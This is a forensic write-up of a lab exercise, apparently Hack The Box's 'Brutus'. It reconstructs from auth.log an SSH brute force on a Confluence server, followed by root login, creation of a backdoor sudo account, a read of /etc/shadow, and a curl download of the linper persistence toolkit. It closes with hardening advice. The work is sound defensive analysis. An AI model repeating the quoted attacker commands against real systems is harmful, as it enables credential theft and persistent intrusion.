Intrusionz3r0-VaultGithubLinkedlnHackthebox

Brutus

Description

We'll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed additional activities, which we can track using auth.log

Summary

On 2025‑03‑06 the Confluence server (ip-172-31-35-28) was brute‑forced over SSH from IP 65.2.161.68 resulting in multiple successful root and user logins. The attacker created a new local account (cyberjunkie), added it to sudo, changed its password, and used it to execute commands including reading /etc/shadow and downloading a persistence tool. Impact: Root compromise and persistent access.

Files & Artifacts

  • wtmp is a binary file in Linux-based systems located at /var/log/wtmp that records a history of all user logins, logouts, and system shutdowns or reboots. It is used by system administrators for monitoring user activity, troubleshooting login issues, and analyzing system usage.

  • auth.log is a file in Linux systems that records authentication events, such as user login attempts, successful or failed logins, and administrative actions like using the sudo command.

Event Types Observed

❯ cat auth.log | awk '{print $5}' | cut -d ':' -f1 | cut -d '[' -f1 | sort| uniq -c
      1 chfn
    104 CRON
      3 groupadd
      1 passwd
    257 sshd
      6 sudo
      2 systemd
      8 systemd-logind
      1 useradd
      2 usermod

Indicators of Compromise (IOCs)

Type
Indicator
Description

IP Address

65.2.161.68

External attacker performing brute force

Username

root, cyberjunkie

Compromised and attacker-created accounts

File/Tool

linper.sh

Linux persistence toolkit

URL

https://github.com/montysecurity/linper/main/linper.sh

Remote payload source

Chronological Attack Timeline

Brute force activity

During the analysis, a brute force attack commenced on March 6 at 06:31:31, producing a total of 82 failed/invalid attempts.

 cat auth.log | grep sshd | grep -v "pam_unix"  | grep "65.2.161.68" | grep -E "Failed|Invalid"
Mar  6 06:31:31 ip-172-31-35-28 sshd[2325]: Invalid user admin from 65.2.161.68 port 46380
Mar  6 06:31:31 ip-172-31-35-28 sshd[2327]: Invalid user admin from 65.2.161.68 port 46392
Mar  6 06:31:31 ip-172-31-35-28 sshd[2332]: Invalid user admin from 65.2.161.68 port 46444
Mar  6 06:31:31 ip-172-31-35-28 sshd[2331]: Invalid user admin from 65.2.161.68 port 46436
Mar  6 06:31:31 ip-172-31-35-28 sshd[2330]: Invalid user admin from 65.2.161.68 port 46422
Mar  6 06:31:31 ip-172-31-35-28 sshd[2337]: Invalid user admin from 65.2.161.68 port 46498
Mar  6 06:31:31 ip-172-31-35-28 sshd[2328]: Invalid user admin from 65.2.161.68 port 46390
Mar  6 06:31:31 ip-172-31-35-28 sshd[2335]: Invalid user admin from 65.2.161.68 port 46460
Mar  6 06:31:31 ip-172-31-35-28 sshd[2334]: Invalid user admin from 65.2.161.68 port 46454
Mar  6 06:31:31 ip-172-31-35-28 sshd[2329]: Invalid user admin from 65.2.161.68 port 46414
Mar  6 06:31:31 ip-172-31-35-28 sshd[2333]: Invalid user admin from 65.2.161.68 port 46452
Mar  6 06:31:33 ip-172-31-35-28 sshd[2327]: Failed password for invalid user admin from 65.2.161.68 port 46392 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2331]: Failed password for invalid user admin from 65.2.161.68 port 46436 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2332]: Failed password for invalid user admin from 65.2.161.68 port 46444 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2335]: Failed password for invalid user admin from 65.2.161.68 port 46460 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2337]: Failed password for invalid user admin from 65.2.161.68 port 46498 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2334]: Failed password for invalid user admin from 65.2.161.68 port 46454 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2338]: Failed password for backup from 65.2.161.68 port 46512 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2336]: Failed password for backup from 65.2.161.68 port 46468 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2330]: Failed password for invalid user admin from 65.2.161.68 port 46422 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2328]: Failed password for invalid user admin from 65.2.161.68 port 46390 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2329]: Failed password for invalid user admin from 65.2.161.68 port 46414 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2333]: Failed password for invalid user admin from 65.2.161.68 port 46452 ssh2
Mar  6 06:31:34 ip-172-31-35-28 sshd[2352]: Failed password for backup from 65.2.161.68 port 46568 ssh2
Mar  6 06:31:34 ip-172-31-35-28 sshd[2351]: Failed password for backup from 65.2.161.68 port 46538 ssh2
Mar  6 06:31:34 ip-172-31-35-28 sshd[2355]: Failed password for backup from 65.2.161.68 port 46576 ssh2
Mar  6 06:31:34 ip-172-31-35-28 sshd[2357]: Failed password for backup from 65.2.161.68 port 46582 ssh2
Mar  6 06:31:35 ip-172-31-35-28 sshd[2359]: Invalid user server_adm from 65.2.161.68 port 46596
Mar  6 06:31:35 ip-172-31-35-28 sshd[2361]: Invalid user server_adm from 65.2.161.68 port 46614
Mar  6 06:31:35 ip-172-31-35-28 sshd[2368]: Invalid user server_adm from 65.2.161.68 port 46676
Mar  6 06:31:35 ip-172-31-35-28 sshd[2369]: Invalid user server_adm from 65.2.161.68 port 46682
Mar  6 06:31:35 ip-172-31-35-28 sshd[2366]: Invalid user server_adm from 65.2.161.68 port 46648
Mar  6 06:31:35 ip-172-31-35-28 sshd[2365]: Invalid user server_adm from 65.2.161.68 port 46644
Mar  6 06:31:35 ip-172-31-35-28 sshd[2364]: Invalid user server_adm from 65.2.161.68 port 46632
Mar  6 06:31:35 ip-172-31-35-28 sshd[2367]: Invalid user server_adm from 65.2.161.68 port 46664
Mar  6 06:31:35 ip-172-31-35-28 sshd[2363]: Invalid user server_adm from 65.2.161.68 port 46620
Mar  6 06:31:35 ip-172-31-35-28 sshd[2377]: Invalid user server_adm from 65.2.161.68 port 46684
Mar  6 06:31:36 ip-172-31-35-28 sshd[2379]: Invalid user server_adm from 65.2.161.68 port 46698
Mar  6 06:31:36 ip-172-31-35-28 sshd[2380]: Invalid user server_adm from 65.2.161.68 port 46710
Mar  6 06:31:36 ip-172-31-35-28 sshd[2383]: Invalid user svc_account from 65.2.161.68 port 46722
Mar  6 06:31:36 ip-172-31-35-28 sshd[2384]: Invalid user svc_account from 65.2.161.68 port 46732
Mar  6 06:31:36 ip-172-31-35-28 sshd[2357]: Failed password for backup from 65.2.161.68 port 46582 ssh2
Mar  6 06:31:36 ip-172-31-35-28 sshd[2387]: Invalid user svc_account from 65.2.161.68 port 46742
Mar  6 06:31:36 ip-172-31-35-28 sshd[2389]: Invalid user svc_account from 65.2.161.68 port 46744
Mar  6 06:31:37 ip-172-31-35-28 sshd[2359]: Failed password for invalid user server_adm from 65.2.161.68 port 46596 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2361]: Failed password for invalid user server_adm from 65.2.161.68 port 46614 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2368]: Failed password for invalid user server_adm from 65.2.161.68 port 46676 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2369]: Failed password for invalid user server_adm from 65.2.161.68 port 46682 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2365]: Failed password for invalid user server_adm from 65.2.161.68 port 46644 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2366]: Failed password for invalid user server_adm from 65.2.161.68 port 46648 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2364]: Failed password for invalid user server_adm from 65.2.161.68 port 46632 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2367]: Failed password for invalid user server_adm from 65.2.161.68 port 46664 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2363]: Failed password for invalid user server_adm from 65.2.161.68 port 46620 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2391]: Invalid user svc_account from 65.2.161.68 port 46750
Mar  6 06:31:37 ip-172-31-35-28 sshd[2393]: Invalid user svc_account from 65.2.161.68 port 46774
Mar  6 06:31:37 ip-172-31-35-28 sshd[2377]: Failed password for invalid user server_adm from 65.2.161.68 port 46684 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2394]: Invalid user svc_account from 65.2.161.68 port 46786
Mar  6 06:31:37 ip-172-31-35-28 sshd[2397]: Invalid user svc_account from 65.2.161.68 port 46814
Mar  6 06:31:37 ip-172-31-35-28 sshd[2398]: Invalid user svc_account from 65.2.161.68 port 46840
Mar  6 06:31:37 ip-172-31-35-28 sshd[2396]: Invalid user svc_account from 65.2.161.68 port 46800
Mar  6 06:31:37 ip-172-31-35-28 sshd[2400]: Invalid user svc_account from 65.2.161.68 port 46854
Mar  6 06:31:38 ip-172-31-35-28 sshd[2379]: Failed password for invalid user server_adm from 65.2.161.68 port 46698 ssh2
Mar  6 06:31:38 ip-172-31-35-28 sshd[2380]: Failed password for invalid user server_adm from 65.2.161.68 port 46710 ssh2
Mar  6 06:31:38 ip-172-31-35-28 sshd[2383]: Failed password for invalid user svc_account from 65.2.161.68 port 46722 ssh2
Mar  6 06:31:38 ip-172-31-35-28 sshd[2384]: Failed password for invalid user svc_account from 65.2.161.68 port 46732 ssh2
Mar  6 06:31:38 ip-172-31-35-28 sshd[2387]: Failed password for invalid user svc_account from 65.2.161.68 port 46742 ssh2
Mar  6 06:31:38 ip-172-31-35-28 sshd[2389]: Failed password for invalid user svc_account from 65.2.161.68 port 46744 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2391]: Failed password for invalid user svc_account from 65.2.161.68 port 46750 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2393]: Failed password for invalid user svc_account from 65.2.161.68 port 46774 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2394]: Failed password for invalid user svc_account from 65.2.161.68 port 46786 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2397]: Failed password for invalid user svc_account from 65.2.161.68 port 46814 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2398]: Failed password for invalid user svc_account from 65.2.161.68 port 46840 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2396]: Failed password for invalid user svc_account from 65.2.161.68 port 46800 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2400]: Failed password for invalid user svc_account from 65.2.161.68 port 46854 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2399]: Failed password for root from 65.2.161.68 port 46852 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2407]: Failed password for root from 65.2.161.68 port 46876 ssh2
Mar  6 06:31:39 ip-172-31-35-28 sshd[2409]: Failed password for root from 65.2.161.68 port 46890 ssh2
Mar  6 06:31:41 ip-172-31-35-28 sshd[2399]: Failed password for root from 65.2.161.68 port 46852 ssh2
Mar  6 06:31:41 ip-172-31-35-28 sshd[2407]: Failed password for root from 65.2.161.68 port 46876 ssh2
Mar  6 06:31:41 ip-172-31-35-28 sshd[2409]: Failed password for root from 65.2.161.68 port 46890 ssh2
Mar  6 06:31:42 ip-172-31-35-28 sshd[2423]: Failed password for backup from 65.2.161.68 port 34834 ssh2
Mar  6 06:31:42 ip-172-31-35-28 sshd[2424]: Failed password for backup from 65.2.161.68 port 34856 ssh2
❯ cat auth.log | grep sshd | grep -v "pam_unix"  | grep "65.2.161.68" | grep -E "Failed|Invalid" | wc -l
82

Successful Compromise

At 06:31:40, one of the brute force attempts successfully guessed the root account password, resulting in a complete compromise of the server.

❯ cat auth.log | grep sshd | grep -v "pam_unix"  | grep "65.2.161.68" | grep -E "Accepted"
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2

At 06:31:40 to 06:32:45, an authentication was recorded:

  • Session 34 was a successful brute force attempt.

  • Session 37 involved manual root user authentication.

❯ cat auth.log  | grep -A 3 "Accepted"
<SNIF>
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar  6 06:31:40 ip-172-31-35-28 systemd-logind[411]: New session 34 of user root.
Mar  6 06:31:40 ip-172-31-35-28 sshd[2379]: Received disconnect from 65.2.161.68 port 46698:11: Bye Bye [preauth]
--
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar  6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.
Mar  6 06:33:01 ip-172-31-35-28 CRON[2561]: pam_unix(cron:session): session opened for user confluence(uid=998) by (uid=0)
<SNIF>

Post-Compromise Actions

At 06:34:18 an account was created on the server called cyberjunkie.

Mar  6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1

T1136.001 Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

Between 06:34:18 and 06:35:15, the malicious actor created a group named cyberjunkie, created a user with the same name, set the password, updated the information, and granted administrative privileges to ensure the persistence on the server.

 Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/group: name=cyberjunkie, GID=1002
 Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/gshadow: name=cyberjunkie
 Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: new group: name=cyberjunkie, GID=1002
 Mar  6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1
 Mar  6 06:34:26 ip-172-31-35-28 passwd[2603]: pam_unix(passwd:chauthtok): password changed for cyberjunkie
 Mar  6 06:34:31 ip-172-31-35-28 chfn[2605]: changed user 'cyberjunkie' information
 ar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to group 'sudo'
ar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to shadow group 'sudo'

Bad Actor logged out

At 06:37:24, the root user logged out of Session 37.

❯ cat auth.log | grep "Session 37 logged out"
Mar  6 06:37:24 ip-172-31-35-28 systemd-logind[411]: Session 37 logged out. Waiting for processes to exit.

At 06:37:34, the malicious actor logged into the system using the cyberjunkie account.

Mar  6 06:37:34 ip-172-31-35-28 sshd[2667]: Accepted password for cyberjunkie from 65.2.161.68 port 43260 ssh2
Mar  6 06:37:34 ip-172-31-35-28 sshd[2667]: pam_unix(sshd:session): session opened for user cyberjunkie(uid=1002) by (uid=0)
Mar  6 06:37:34 ip-172-31-35-28 systemd-logind[411]: New session 49 of user cyberjunkie.

Finally, the account cyberjunkie read the /etc/shadows file in order to validate the high privilege permissions for the subsequently downloaded linper to maintain persistence on the system.

Tool: https://github.com/montysecurity/linper

 Mar  6 06:37:34 ip-172-31-35-28 systemd: pam_unix(systemd-user:session): session opened for user cyberjunkie(uid=1002) by (uid=0)
 Mar  6 06:37:57 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow
 Mar  6 06:39:38 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh

Recommendations

  • Disable root SSH login (PermitRootLogin no)

  • Enforce key-based authentication

  • Enable fail2ban or equivalent SSH brute-force protection

  • Audit /etc/sudoers for unauthorized users

  • Rotate all credentials and remove cyberjunkie account

  • Review /etc/rc.local and crontabs for persistence traces

PreviousUnit42NextBFT

Last updated